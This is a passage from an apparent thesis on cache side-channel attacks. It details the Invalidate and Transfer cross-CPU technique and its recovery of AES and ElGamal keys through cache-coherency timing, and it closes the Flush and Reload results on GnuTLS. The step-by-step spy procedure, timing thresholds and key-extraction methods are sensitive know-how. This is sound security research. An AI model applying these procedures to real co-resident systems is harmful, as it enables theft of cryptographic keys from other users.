Finally, we present the results confirming that GnuTLS 3.2.0 with TLS 1.2 is also vulnerable to this kind of attack. Again, the measurements were taken assuming that the attacker knows the last byte P_15 and wants to recover P_14, i.e., she wants to observe the case where she injects a 0x01|0x01 padding. However, GnuTLS's behavior shows some differences with respect to the previous cases.

For GnuTLS, we find that if we set an access threshold of three accesses in a row (which yields our desired hit), the probability of getting false positives is very low. Based on experimental measurements, we observed such behavior only when the dummy function is executed. However, the attacker needs more messages to be able to detect one of these hits. Observing one hit already indicates with high probability that the function was called, but we also consider the two-hit case in case the attacker wants the probability of false positives to be even lower.
Based on these measurements, we conclude that the attacker recovers the plaintext with very high probability, so we did not find it necessary to consider the three-hit case.

Figure 4.11: (GnuTLS 3.2.0) Success probability of recovering P_14, assuming P_15 known, vs. L, for different numbers of hits required. L refers to the number of 2^8-trace batches needed, so the total number of messages is 2^8 * L.

4.6 Flush and Reload Outcomes

In short, we demonstrated that if the memory deduplication requirement is satisfied, Flush and Reload can have severe consequences for processes/users co-residing in the same CPU socket, even if they are located in different CPU cores. We have demonstrated that such an attack can be utilized to recover cryptographic keys and TLS messages from CPU co-resident users. Moreover, we demonstrated that Flush and Reload can bypass the isolation techniques implemented by commonly used hypervisors to avoid cross-VM leakage. Despite all these advantages, we observed two major hurdles that Flush and Reload cannot overcome:

•Flush and Reload cannot attack victims located in a different CPU; it is restricted to victims located in the same CPU socket.

•Flush and Reload cannot be applied in systems in which memory deduplication does not exist, as the attacker does not get access to the victim's data. This fact also restricts Flush and Reload to attacking only statically allocated data.

In the following chapters we explain how to overcome these two obstacles.

Chapter 5
The First Cross-CPU Attack: Invalidate and Transfer

In the previous sections we presented Flush and Reload as a cross-core side channel attack targeting Intel processors. However, the utilized covert channel makes use of specific characteristics that Intel processors feature.
For example, the proposed LLC attack takes advantage of the inclusive cache design of these processors. Furthermore, it relies on the fact that the LLC is shared across cores. Therefore the Flush and Reload attack succeeds only when the victim and the attacker are co-located on the same CPU. These characteristics are not observed in other CPUs, e.g. AMD or ARM. Aiming to solve these issues, this chapter presents Invalidate and Transfer, an attack that expands deduplication-enabled LLC attacks to victims residing in different CPU sockets, with any LLC characteristics. We utilize AMD as an example, but the same technique should also succeed on ARM processors. In this regard, AMD servers present two main complications that prevent the application of existing side channel attacks:

•AMD tends to have more CPU sockets in high-end servers than Intel. This reduces the chance of being co-located on the same CPU, and therefore of applying the aforementioned Flush and Reload attack.

•LLCs in AMD are usually exclusive or non-inclusive. The former does not allocate a memory block in different cache levels at the same time; that is, data is present in only one level of the cache hierarchy. Non-inclusive caches show neither inclusive nor exclusive behavior. This means that any memory access first fetches the memory block into the upper-level caches, but the data can then be evicted from the outer or inner caches independently. Hence, accesses to the L1 cache cannot be detected by monitoring the LLC, as is possible on Intel machines.

Hence, to perform a side channel attack on AMD processors, both of these challenges need to be overcome. Here we present a covert channel that is immune to both complications. The proposed Invalidate and Transfer attack is the first side channel attack that works across CPUs featuring non-inclusive or exclusive caches. Invalidate and Transfer presents a new covert channel based on the cache coherency technologies implemented in modern processors.
In particular, we focus on AMD processors, which have exclusive caches that in principle are invulnerable to cache side channel attacks, although the results can be readily applied to multi-CPU Intel systems as well. In summary:

•We present the first cross-CPU side channel attack, showing that CPU co-location is not needed in multi-CPU servers to obtain fine grain information.

•We present a new deduplication-based covert channel that utilizes directory-based cache coherency protocols to extract sensitive information.

•We show that the new covert channel succeeds on processors where cache attacks have not been shown to be possible before, e.g. AMD exclusive caches.

•We demonstrate the feasibility of our new side channel technique by mounting an attack on a T-table based AES implementation and on a square-and-multiply implementation of the El Gamal scheme.

5.1 Cache Coherence Protocols

In order to ensure coherence between different copies of the same data, systems implement cache coherence protocols. In the multiprocessor setting, the coherency between shared blocks that are cached in different processors (and therefore in different caches) also needs to be maintained. The system has to ensure that each processor accesses the most recent value of a shared block, regardless of where that memory block is cached.

The two main categories of cache coherence protocols are snooping-based protocols and directory-based protocols. Although snooping-based protocols follow a decentralized approach, they usually require a centralized data bus that connects all caches, which results in excessive bandwidth requirements as the number of cores increases. Directory-based protocols, in contrast, enable point-to-point connections between cores and directories, an approach that scales much better with an increasing number of cores. We focus on the latter, since it is the prevailing choice in current multiprocessor systems.
The directory keeps track of the state of each cached memory block. Thus, upon a memory block access request, the directory decides the state that the memory block has to be turned into, both in the requesting node and in the sharing nodes that have a cached copy of the requested memory block. We analyze the simplest cache coherence protocol, with only 3 states, since the attack implemented in this study relies on read-only data; the additional states applied in more complicated coherency protocols do not affect the flow of our attack.

We introduce the terms home node for the node where the memory block resides, local node for the node requesting access to the memory block, and owner node for a node that has a valid copy of the memory block cached. This leads to various communication messages, summarized as follows:

•A memory block cached in one or more nodes can be in the uncached, exclusive/modified, or shared state.

•Upon a read hit, the local node's cache services the data. In this case, the memory block maintains its state.

•Upon a read miss, the local node contacts the home node to retrieve the memory block. The directory knows the state of the memory block in the other nodes, so its state is changed accordingly: if the block is in the exclusive state, it goes to shared; if the block is in the shared state, it maintains it. In both cases the local node then becomes an owner and holds a copy of the shared memory block.

•Upon a write hit, the local node sets the memory block to exclusive. The local node instructs the nodes that have a cached copy of the memory block to invalidate or update it.

•Upon a write miss, again the home node services the memory block. The directory knows the nodes that have a cached copy of the memory block, and therefore sends them either an update or an invalidate message. The local node then becomes the owner of the exclusive memory block.
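The directory transitions just listed can be condensed into a toy model. The class below is an illustrative sketch (the API and node names are invented, and writes are simplified to the invalidate variant), not part of any real coherence implementation:

```python
class Directory:
    """Toy home-node directory for the 3-state protocol sketched above."""

    def __init__(self):
        self.state = "uncached"
        self.owners = set()   # nodes holding a cached copy

    def read(self, node):
        if node in self.owners:
            return            # read hit: state unchanged
        # read miss: exclusive degrades to shared, shared stays shared,
        # and the requester becomes an owner
        self.state = "shared"
        self.owners.add(node)

    def write(self, node):
        # write hit or miss: every other copy is invalidated and the
        # local node becomes the owner of the exclusive block
        self.owners = {node}
        self.state = "exclusive"

d = Directory()
d.read("A"); d.read("B")
print(d.state, sorted(d.owners))  # shared ['A', 'B']
d.write("A")
print(d.state, sorted(d.owners))  # exclusive ['A']
```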
In practice, most cache coherency protocols have additional states that a memory block can acquire. The most studied is the MESI protocol, in which the exclusive state is split into the exclusive and modified states. A memory block is exclusive when a single node has a clean copy of it cached. However, when a cached memory block is modified, it acquires the modified state, since it is no longer consistent with the value stored in memory. A write-back operation sets the memory block back to the exclusive state.

The protocols implemented in modern processors are variants of the MESI protocol, mainly adding further states. For instance, the Intel i7 processor uses the MESIF protocol, which adds the forward state. This state designates the sharing processor that should reply to a request for a shared memory block, without involving a memory access operation. The AMD Opteron utilizes the MOESI protocol with the additional owned state. This state indicates that the memory block is owned by the corresponding cache and is out of date with respect to the memory value. However, contrary to the MESI protocol, where a transition from modified to shared involves a write-back operation, a node holding a memory block in the owned state can service it to the sharing nodes without writing it back to memory. Note that both the MESIF and the MOESI protocol involve a cache-to-cache block forwarding operation: both the owned and the forward state imply that a cache, rather than the DRAM, will satisfy the read request. If the access time from cache differs from regular DRAM access times, this behavior becomes an exploitable covert channel.

5.1.1 AMD HyperTransport Technology

Cache coherency plays a key role in multi-core servers, where a memory block might reside in many core-private caches in the same state or in a modified state. In multiple-socket servers, this coherency has to be maintained not only within a processor but also across CPUs.
Thus, complex technologies are implemented to ensure coherency across the system. These technologies center around the directory-based protocols explained in Section 5.1. The HyperTransport technology implemented by AMD processors serves as a good example. We focus only on the features relevant to the newly proposed covert channel; a detailed explanation can be found in [CKD+10, AMD].

The HyperTransport technology reserves a portion of the LLC to act as a directory cache for the directory-based protocol. This directory cache keeps track of the cached memory blocks present in the system. Once the directory is full, one of the previous entries is replaced to make room for a new cached memory block. The directory always knows the state of any cached memory block, i.e., if a cache line exists in any of the caches, it must also have an entry in the directory.

Any memory request goes first through the home node's directory. The directory knows which processors, if any, have the requested memory block cached. The home node initiates in parallel both a DRAM access and a probe filter. The probe filter is the action of checking in the directory which processor has a copy of the requested memory block. If any node holds a cached copy of the memory block, a directed probe against it is initiated, i.e., the memory block is forwarded directly from the cache holding it to the requesting processor. A directed probe message does not trigger a DRAM access. Instead, communication between nodes is carried over HyperTransport links, which can run as fast as 3 GHz. Figure 5.1 shows a diagram of how the HyperTransport links directly connect the different CPUs to each other, avoiding memory node accesses.

Although many execution patterns can arise from this protocol, we only explain those relevant to the attack, i.e. events triggered on read-only blocks, which we elaborate on later.
We assume that we have processors A and B, referred to as P_a and P_b, that share a memory block:

•If P_a and P_b have the same memory block cached, then upon a modification made by P_a, HyperTransport notifies P_b that P_a has the latest version of the memory block. P_a's copy of the block is thereby converted from a shared block into an owned block. Upon a new request made by P_b, HyperTransport transfers the updated memory block cached in P_a.

•Similarly, upon a cache miss in P_a, the home node sends a probe message to the processors that have a copy of the same shared memory block, if any. If, for instance, P_b has it, a directed probe message is initiated so that P_b can service the cached data through the HyperTransport links. HyperTransport thus reduces the latency of retrieving a memory block from the DRAM by also checking whether someone else maintains a cached copy of the same memory block. Note that this process does not involve a write-back operation.

•When a new entry has to be placed in the directory of P_a and the directory is full, one of the previously allocated entries has to be evicted to make room for the new entry. This is referred to as a downgrade probe. In this case, if the cache line is dirty, a write-back is forced, and an invalidate message is sent to all the processors (here, P_b) that maintain a cached copy of the same memory block.

Figure 5.1: DRAM accesses vs. directed probes over the HyperTransport links.

In short, HyperTransport reduces the latencies observed in previously implemented cache coherency protocols by issuing directed probes to the nodes that have a copy of the requested memory block cached. The HyperTransport links ensure a fast transfer to the requesting node. In fact, the introduction of HyperTransport links greatly improved the performance, and thus the viability, of multi-CPU systems.
Earlier multi-CPU systems relied on broadcast or directory protocols in which a request for an exclusively cached memory block held by an adjacent processor implied a write-back operation to retrieve the up-to-date memory block from the DRAM.

5.1.2 Intel QuickPath Interconnect Technology

In order to maintain cache coherency across multiple CPUs, Intel implements a technique similar to AMD's HyperTransport, called Intel QuickPath Interconnect (QPI) [Intd, IQP]. Indeed, the latter was designed five years later than the former to compete with the existing technology in AMD processors. Like HyperTransport, QPI connects one or more processors through high-speed point-to-point links running as fast as 3.2 GHz. Each processor has a memory controller on the same die to improve performance. As we have already seen with AMD, among other advantages this interface efficiently manages cache coherence in multi-processor servers by transferring shared memory blocks through the high-speed QPI links. Consequently, the mechanisms we propose in this work are also applicable to servers featuring multiple Intel CPUs.

Figure 5.2: Comparison of a directed probe access across processors: probe satisfied from CPU 1's cache directly via the HyperTransport link (a) vs. probe satisfied by CPU 1 via a slow DRAM access (b).

5.2 Invalidate and Transfer Attack Procedure

We propose a new spy process that takes advantage of leakage observed in the cache coherency protocol when memory blocks are shared between several processors/cores. The spy process does not rely on specific characteristics of the cache hierarchy, such as inclusiveness. In fact, the spy process works even across co-resident CPUs that do not share the same cache hierarchy.
From now on, we assume that the victim and attacker share the same memory block and that they are located in different CPUs, or in different cache hierarchies, of the same server. The spy process is executed in three main steps:

•Invalidate step: The attacker invalidates a memory block that is in his own cache hierarchy. If the invalidation is performed on a shared memory block that is also cached in another processor's cache hierarchy, HyperTransport sends an invalidate message to that processor. Therefore, after the invalidation step the memory block is invalidated in, and evicted from, all the caches holding a copy of it. The invalidation can be achieved with specialized instructions like clflush, if they are supported by the targeted processors, or by priming the set where the memory block resides in the cache directory.

•Wait step: The attacker waits for a certain period of time to let the victim do some computation. The victim may or may not use the invalidated memory block in this step.

•Transfer step: In the last step, the attacker requests access to the shared memory block that was invalidated. If any processor in the system has cached this memory block, the entry in the directory will have been updated and a directed probe request will be sent to that processor. If the memory block has not been used, the home directory will instead issue a DRAM access for the memory block. The system experiences a lower latency when a directed probe is issued, mainly because the memory block is served from another processor's cache hierarchy.

Figure 5.3: Timing distribution of a memory block request serviced by the DRAM (red) vs. a block request serviced by a co-resident processor (blue) on an AMD Opteron 6168. The measurements are taken from different CPUs. Outliers above 400 cycles have been removed.
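As with Flush and Reload, the three steps reduce to a timed load plus a threshold. The sketch below is a purely illustrative Python model: the coherency traffic and cycle counts are assumptions standing in for the real clflush/rdtsc machinery:

```python
THRESHOLD = 175  # cycles; assumed boundary between a directed probe
                 # (~150 cycles) and a DRAM access (~210 cycles)

def invalidate(block, caches):
    for c in caches:              # Step 1: the invalidate message
        c.discard(block)          # reaches every cache holding a copy

def transfer_time(block, caches):
    # Step 3: a directed probe is fast if some CPU re-cached the block;
    # otherwise the home node falls back to a slower DRAM access
    return 150 if any(block in c for c in caches) else 210

def victim_used_block(block, victim, caches):
    invalidate(block, caches)     # Step 1: invalidate everywhere
    victim(caches)                # Step 2: wait while the victim runs
    return transfer_time(block, caches) < THRESHOLD

touches = lambda caches: caches[0].add("blk")   # victim uses the block
idles = lambda caches: None                     # victim does not
print(victim_used_block("blk", touches, [set()]))  # True
print(victim_used_block("blk", idles, [set()]))    # False
```

The roughly 50-cycle gap modeled between the two cases mirrors the separation visible in the measured distributions.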
This is graphically observed in Figure 5.2: Figure 5.2(a) shows a request serviced over the HyperTransport link by a CPU that has the same memory block cached, while Figure 5.2(b) represents a request serviced by a DRAM access. This introduces a new leakage if the attacker is able to measure and distinguish the time that the two actions take; this is the covert channel exploited in this work.

We use the RDTSC instruction, which reads the time stamp counter, to measure the request time. In case RDTSC is not available from user mode, one can instead create a parallel thread that increments a shared variable acting as a counter. We also utilize the mfence instruction to ensure that all memory load/store operations have finished before reading the time stamp counter.

The timing distributions of both the DRAM access and the directed transfer access are shown in Figure 5.3, where 10,000 points of each distribution were taken across CPUs on a 48-core, four-CPU AMD Opteron 6168. The x-axis represents hardware cycles, while the y-axis represents the density function. The measurements are taken across processors. The blue distribution represents a directed probe access, i.e., a co-resident CPU has the memory block cached, whereas the red distribution represents a DRAM access, i.e., the memory block is not cached anywhere. It can be observed that the distributions differ by about 50 cycles, fine-grained enough to distinguish them. However, the variance of the two distributions is very similar, in contrast to LLC covert channels.

Figure 5.4: Timing distribution of a memory block request serviced by the DRAM (red) vs. a block request serviced by a co-resident core (blue) on a dual-core Intel E5-2609. The measurements are taken from the same CPU. Outliers above 700 cycles have been removed.
Nevertheless, we obtain a covert channel that works across CPUs and does not rely on the inclusiveness property of the cache. We also tested the viability of the covert channel on a dual-socket Intel Xeon E5-2609. Intel utilizes a technique similar to HyperTransport, called Intel QuickPath Interconnect. The results for the Intel processor are shown in Figure 5.4, again with the processes running in different CPUs. It can be observed that the distributions are even more distinguishable in this case.

5.3 Exploiting the New Covert Channel

In the previous section we established the viability of the covert channel. Here we demonstrate how one might exploit it to extract fine grain information. More concretely, we present two attacks:

•a symmetric cryptography algorithm, i.e. the table-based OpenSSL implementation of AES, and

•a public key algorithm, i.e. a square-and-multiply based libgcrypt implementation of the El Gamal scheme.

5.3.1 Attacking Table Based AES

We test the granularity of the new covert channel by mounting an attack on a software implementation of AES, as in Section 4.4. We again use the C OpenSSL reference implementation, which uses 4 different T-tables across the 10 rounds of AES-128. To recap, we monitor a memory block belonging to each one of the T-tables. Each memory block contains 16 T-table positions, and it has a certain probability, 8% in our particular case, of not being used in any of the 10 rounds of an encryption. Thus, by applying our Invalidate and Transfer attack and recording the ciphertext output, we can tell when the monitored memory block has not been used. For this purpose we invalidate the memory block before the encryption and try to probe it after the encryption.
In a noise free scenario, the monitored memory block will not be used for 240 of the ciphertext values with 8% probability, and it will not be used for the remaining 16 ciphertext values with 0% probability (because they directly map through the key to the monitored T-table memory block). Although microarchitectural attacks suffer from different microarchitectural sources of noise, we expect that the Invalidate and Transfer can still distinguish both distributions. Once we know the ciphertext values belonging to both distributions, we can apply the equation K_i = T[S_j] ⊕ C_i to recover the key. Since the last round of AES involves only a table look-up and an XOR operation, knowing the ciphertext and the T-table block position used is enough to obtain the key byte candidate that was used during the last AES round. Since a cache line holds 16 T-table values, we XOR each of the obtained ciphertext values with all the 16 possible T-table values that they could map to. Clearly, the key candidate will be a common factor in the computations, with the exception of the observed noise, which is eliminated via averaging. As the AES key schedule is invertible, knowing one of the round keys is equivalent to knowing the full encryption key.

5.3.2 Attacking Square and Multiply El Gamal Decryption

We test the viability of the new side channel technique with an attack on a square and multiply libgcrypt implementation of the public key ElGamal algorithm, as in [ZJRR12]. An ElGamal encryption involves a cyclic group of order p and a generator g of that cyclic group. Alice chooses a number a ∈ Z*_p, computes her public key as the 3-tuple (p, g, g^a), and keeps a as her secret key. To encrypt a message m, Bob first chooses a number b ∈ Z*_p, calculates y_1 = g^b and y_2 = ((g^a)^b) * m, and sends both to Alice. In order to decrypt the message, Alice utilizes her secret key a to compute ((y_1)^{-a}) * y_2. Note that if a malicious user recovers the secret key a, he can decrypt any message sent to Alice.
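Alice's exponentiation y_1^{-a} can be sketched with the textbook square-and-multiply loop. This is a minimal sketch with the conventional R = 1 initialization and 64-bit toy operands; libgcrypt operates on multi-precision integers, and in practice the negative exponent is first reduced (e.g., -a ≡ p-1-a mod p-1 for a prime modulus p).

```c
#include <stdint.h>
#include <assert.h>

/* Square-and-multiply modular exponentiation, scanning the exponent from
 * the most significant to the least significant bit. The data-dependent
 * multiply on the exponent's 1-bits is exactly the leak the spy process
 * observes. Requires GCC/Clang's unsigned __int128 for the products. */
static uint64_t modexp(uint64_t b, uint64_t e, uint64_t N)
{
    uint64_t r = 1;
    for (int i = 63; i >= 0; i--) {
        r = (uint64_t)((unsigned __int128)r * r % N);     /* square + reduction */
        if ((e >> i) & 1)
            r = (uint64_t)((unsigned __int128)r * b % N); /* multiply + reduction */
    }
    return r;
}
```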
Our target will be the y_1^{-a} computation, which uses the square and multiply technique as the modular exponentiation method. It bases its procedure on two operations: a square operation followed by a modulo reduction, and a multiplication operation followed by a modulo reduction. The algorithm starts with the intermediate state R = b, b being the base that is going to be powered, and then examines the secret exponent a from the most significant to the least significant bit. If the bit is a 0, the intermediate state is squared and reduced with the modulus. If, on the contrary, the exponent bit is a 1, the intermediate state is first squared, then multiplied with the base b, and then reduced with the modulus. Algorithm 2, presented in the background section and repeated below as Algorithm 6, shows the entire procedure.

Algorithm 6: Square and Multiply Exponentiation
    Input: base b, modulus N, secret E = (e_{k-1}, ..., e_1, e_0)
    Output: b^E mod N
    R = b;
    for i = k-1 downto 0 do
        R = R^2 mod N;
        if e_i == 1 then
            R = R * b mod N;
        end
    end
    return R;

As can be observed, the algorithm does not implement a constant execution flow, i.e., the functions that are used directly depend on the exponent bits. If the square and multiply pattern is known, the complete key can easily be computed by converting the pattern into ones and zeros. Indeed, our Invalidate and Transfer spy process can recover this information, since the functions are stored as shared memory blocks in cryptographic libraries. Thus, we mount an attack with the Invalidate and Transfer to monitor when the square and multiplication functions are utilized.

5.4 Experiment Setup and Results

In this section we present the test setup in which we implemented and executed the Invalidate and Transfer spy process, together with the results obtained for the AES and ElGamal attacks.

5.4.1 Experiment Setup

In order to prove the viability of our attack, we performed our experiments on a 48-core machine featuring four 12-core AMD Opteron 6168 CPUs.
This is a university server which has not been isolated for our experiments, i.e., other users are utilizing it at the same time. Thus, the environment is a realistic scenario in which undesired applications run concurrently with our attack. The machine runs at 1.9 GHz, featuring 3.2 GHz HyperTransport links. The server has 4 AMD Opteron 6168 CPUs with 12 cores each. Each core features a private 64 KB 2-way L1 data cache, a private 64 KB L1 instruction cache and a 16-way 512 KB L2 cache. Two 6 MB 96-way associative L3 caches, each one shared across 6 cores, complete the cache hierarchy. The L1 and L2 caches are core-private resources, whereas each L3 cache is shared between 6 cores. Both the L2 and L3 caches are non-inclusive, i.e., data can be allocated in any one cache level at a time. This is different from the inclusive LLC on which most of the cache spy processes in the literature have been executed. The attacks were implemented on a Red Hat enterprise server running the Linux 2.6.23 kernel. The attacks do not require root access to succeed; in fact, we did not have sudo rights on this server. Since ASLR was enabled, the targeted functions' addresses were retrieved by calculating their offset with respect to the starting point of the library. All the experiments were performed across CPUs, i.e., attacker and victim do not reside in the same CPU and do not share any LLC. To ensure this, we utilized the taskset command to assign the CPU affinity of our processes. Our targets were the AES C reference implementation of OpenSSL and the ElGamal square and multiply implementation of libgcrypt 1.5.2. The libraries are compiled as shared, i.e., all users in the OS will use the same shared symbols (through the KSM mechanism). In the case of AES we assume we are synchronized with the AES server, i.e., the attacker sends plaintexts and receives the corresponding ciphertexts. As for the ElGamal case, we assume we are not synchronized with the server.
Instead, the attacker process simply monitors the function until valid patterns are observed, which are then used for key extraction.

5.4.2 AES Results

As explained in Section 5.3, in order to recover the full key we need to target a single memory block from each of the four T-tables. However, in the case that a T-table memory block starts in the middle of a cache line, monitoring only 2 memory blocks is enough to recover the full key. In fact, there exists a memory block that contains both the last 8 values of T0 and the first 8 values of T1. Similarly, there exists a memory block that contains the last 8 values of T2 and the first 8 values of T3. Unlike in Section 4.4, we make use of this fact and only monitor those two memory blocks to recover the entire AES key. We store both the transfer timing and the ciphertext obtained by our encryption server.

Figure 5.5: Miss counter values for each ciphertext value, normalized to the average.

In order to analyze the results, we implement a miss counter approach: we count the number of times that each ciphertext value sees a miss, i.e., that the monitored cache line was not loaded for that ciphertext value. An example of one of the runs for ciphertext byte number 0 is shown in Figure 5.5. The 8 ciphertext values that obtain the lowest scores are the ones corresponding to the cache line, thereby revealing the key value. In order to obtain the key, we iterate over all possible key byte values and compute the last round of AES only for the monitored T-table values, and then group the miss counter values of the resulting ciphertexts in one set. We group in another set the miss counters of the remaining 248 ciphertext values. Clearly, for the correct key, the distance between the two sets will be maximum.
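A simplified sketch of this grouping step: for a key-byte guess, the ciphertext values consistent with the monitored line under the last-round relation C = K ⊕ T[S] form one set and the rest the other, and the difference of average miss counters is the distance to maximize. The `line[]` values below are stand-ins (the first 16 AES S-box bytes), and this is the generic one-line-per-table case with 16 mapped values; the straddling blocks used in the text map 8 values per table.

```c
#include <stdint.h>
#include <assert.h>

/* For one key-byte guess, split the 256 per-ciphertext-value miss counters
 * into the values that map to the monitored line under that guess and the
 * rest, and return the difference of the two set averages. The correct
 * guess maximizes this distance. */
static double guess_distance(const unsigned miss[256],
                             const uint8_t line[16], uint8_t guess)
{
    int mapped[256] = {0};
    for (int j = 0; j < 16; j++)
        mapped[guess ^ line[j]] = 1;          /* C = K xor T[S] */
    double in = 0, out = 0;
    int n_in = 0;
    for (int c = 0; c < 256; c++) {
        if (mapped[c]) { in  += miss[c]; n_in++; }
        else           { out += miss[c]; }
    }
    return out / (256 - n_in) - in / n_in;
}
```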
An example of the output of this step is shown in Figure 5.6, where the y-axis represents the miss counter ratio (i.e., the ratio of the miss counter values in both sets) and the x-axis represents the key byte guess value. It can be observed that the ratio of the correct key byte (180) is much higher than the ratio of the other guesses. Finally, we calculate the number of encryptions needed to recover the full AES key. This is shown in Figure 5.7, where the y-axis again represents the ratios and the x-axis represents the number of encryptions. As can be observed, the correct key is not distinguishable before 10,000 traces, but from 20,000 observations the correct key is clearly distinguishable from the rest. We conclude that the new method succeeds in recovering the correct key from 20,000 encryptions.

Figure 5.6: Correct key byte finding step, iterating over all possible keys. The maximum distance is observed for the correct key (byte guess 180, ratio 0.05315).

Figure 5.7: Difference of ratios over the number of encryptions needed to recover the full AES key. The correct key (bold red line) is clearly distinguishable from 20,000 encryptions.

5.4.3 El Gamal Results

Next we present the results obtained when the attack aims at recovering an ElGamal decryption key. We target a 2048 bit ElGamal key. Remember that, unlike in the case of AES, this attack does not need synchronization with the server, i.e., the server runs continuous decryptions while the attacker continuously monitors the vulnerable function.

Figure 5.8: Trace observed by the Invalidate and Transfer, where 4 decryption operations are monitored. The decryption stages are clearly visible when the square function usage takes the 0 value.
Since the modular exponentiation creates a very specific pattern with respect to both the square and multiply functions, we can easily know when the exponentiation occurred in time. We only monitor a single function, i.e., the square function. In order to avoid speculative execution, we do not monitor the main function address but the following one. This is sufficient to correctly recover a very high percentage of the ElGamal decryption key bits. For our experiments, we take into account the time that the invalidate operation takes; a minimum waiting period of 500 cycles between the invalidate and the transfer operations is sufficient to recover the key patterns. Figure 5.8 presents a trace where 4 different decryptions are caught. A 0 on the y-axis means that the square function is being utilized, a 1 that it is not, and the x-axis represents the time slot number. The decryption stages are clearly observable when the square function gets a 0 value. Recall that the execution flow caused by a 0 bit in the exponent is square + reduction, while the pattern caused by a 1 bit in the exponent is square + reduction + multiply + reduction. Since we only monitor the square operation, we reconstruct the patterns by checking the distance between two square operations. Clearly, the distance between the two square operations in a 00 trace will be smaller than the distance between the two square operations in a 10 trace, since the latter includes an additional multiplication function. With our waiting period threshold, we observe that the distance between two square operations without an intervening multiplication varies from 2 to 4 Invalidate and Transfer steps, while the distance between two square operations with an intervening multiplication varies from 6 to 8 Invalidate and Transfer steps. If the distance between two square operations is lower than 2, we consider it part of the same square operation. An example of such a trace is shown in Figure 5.9.
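The gap-to-bits conversion just described can be sketched as follows, with the thresholds taken from the text: fewer than 2 steps is still the same square operation, 2-4 steps mean a 0 bit, and a larger gap means a 1 bit.

```c
#include <stddef.h>
#include <assert.h>

/* Convert the time-slot indices at which the square function was observed
 * into exponent bits (MSB first). A gap of 2-4 Invalidate and Transfer
 * steps between consecutive squares means square+reduction only (bit 0);
 * a larger gap means an extra multiply+reduction happened in between
 * (bit 1); a gap below 2 is the same square operation. The bit belonging
 * to the final square cannot be decided from gaps alone and is left out. */
static size_t squares_to_bits(const int *slot, size_t n, char *bits)
{
    size_t k = 0;
    for (size_t i = 0; i + 1 < n; i++) {
        int d = slot[i + 1] - slot[i];
        if (d < 2) continue;              /* same square operation */
        bits[k++] = (d <= 4) ? '0' : '1';
    }
    bits[k] = '\0';
    return k;
}
```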
Figure 5.9: Trace observed by the Invalidate and Transfer, converted into square and multiply functions. The y-axis shows a 0 when the square function is used and a 1 when it is not.

In the figure, S refers to a square operation, R refers to a modulo reduction operation, and M refers to a multiply operation. The x-axis represents the time slot, while the y-axis represents whether the square function was utilized: the 0 value means that the square function was utilized, whereas the 1 value means that it was not. The pattern obtained is SRMRSRSRMRSR, which can be translated into the key bit string 1010. However, due to microarchitectural sources of noise (context switches, interrupts, etc.) the recovered key still has some errors. In order to evaluate the error percentage obtained, we compare the obtained bit string with the real key. Any insertion, removal or wrongly guessed bit is counted as a single error. Table 5.1 summarizes the results. We evaluate 20 different key traces obtained with the Invalidate and Transfer spy process. On average, the key patterns have an error percentage of 2.58%. The minimum observed error percentage was 1.9% and the maximum was 3.47%. Thus, since the errors are very likely to occur at different points, we analyse more than one trace in order to decide the correct pattern. On average, 5 traces are needed to recover the key correctly.

Table 5.1: Summary of error results in the ElGamal key recovery attack

    Traces analysed                        20
    Maximum error observed                 3.47%
    Minimum error observed                 1.9%
    Average error                          2.58%
    Traces needed to recover full key      5

5.5 Invalidate and Transfer Outcomes

We presented the Invalidate and Transfer attack, capable of recovering, for the first time, information across CPU sockets in systems that provide memory deduplication.
The new attack utilizes the cache coherency protocol as a covert channel, and its effectiveness was proved by recovering both AES and ElGamal keys. Further, the attack is agnostic to the inclusiveness property of the cache. On the downside, the attack still requires attacker and victim to share memory, and thus is only applicable in VMMs with memory deduplication or in smartphones. In response, the next chapter introduces an attack that does not rely on the memory deduplication feature, and thus is applicable in virtually every system in which attacker and victim processes can co-reside.

Chapter 6

The Prime and Probe Attack

In previous chapters, we presented two side channel attacks that used hardware cache properties to retrieve information across cores/CPUs. However, both attacks worked under the assumption of shared memory between attacker and victim, which was achievable through mechanisms like KSM. Although we demonstrated that fine grain information can be recovered with them, due to the shared memory requirement we observe the following challenges associated with them:

• Some real world scenarios might not implement memory deduplication features. For instance, some commercial clouds have cross-VM memory deduplication disabled, as is the case for Amazon EC2. Furthermore, memory page sharing is not allowed between trusted and untrusted worlds in Trusted Execution Environments (TEEs).

• Flush and Reload and Invalidate and Transfer, since they rely on memory sharing, cannot retrieve information from dynamically allocated memory, as every user gets their own copy of it. This limits the applicability of both attacks.

These two inconveniences restrict the applicability of Flush and Reload and Invalidate and Transfer. Thus, it is necessary to know whether an attacker can bypass these obstacles and still gain information about a victim's activity across cores. This chapter explains a new approach that utilizes the Last Level Cache (LLC) as a covert channel without relying on memory deduplication features.
In particular, we take the already known Prime and Probe attack and make it successful on the LLC. This is not a straightforward process, as it still requires solving some technical issues when targeting the LLC.

6.1 Virtual Address Translation and Cache Addressing

In this chapter we present an attack that takes advantage of some known information in the virtual to physical address mapping process. Thus, we give a brief overview of the procedure followed by modern processors to access and address data in the cache [HP11]. In modern computing, processes use virtual memory to access the different requested memory locations. Indeed, processes do not have direct access to the physical memory, but use virtual addresses that are then mapped to physical addresses by the Memory Management Unit (MMU). This virtual address space is managed by the Operating System. The main benefits of virtual memory are security (processes are isolated from real memory) and the usage of more memory than physically available thanks to paging techniques. The memory is divided into fixed length contiguous blocks called memory pages. Virtual memory allows the usage of these memory pages even when they are not allocated in the main memory. When a specific process needs a page not present in the main memory, a page fault occurs and the page has to be loaded from the auxiliary disk storage. Therefore, a translation stage is needed to map virtual addresses to physical addresses prior to the memory access. In fact, cloud systems have two translation processes, i.e., guest OS virtual address to VMM virtual address and VMM virtual address to physical address. The first translation is handled by shadow page tables while the second one is handled by the MMU. This adds an abstraction layer over the physical memory that is handled by the VMM. During translation, the virtual address is split into two fields: the offset field and the page field. The length of both fields depends directly on the page size.
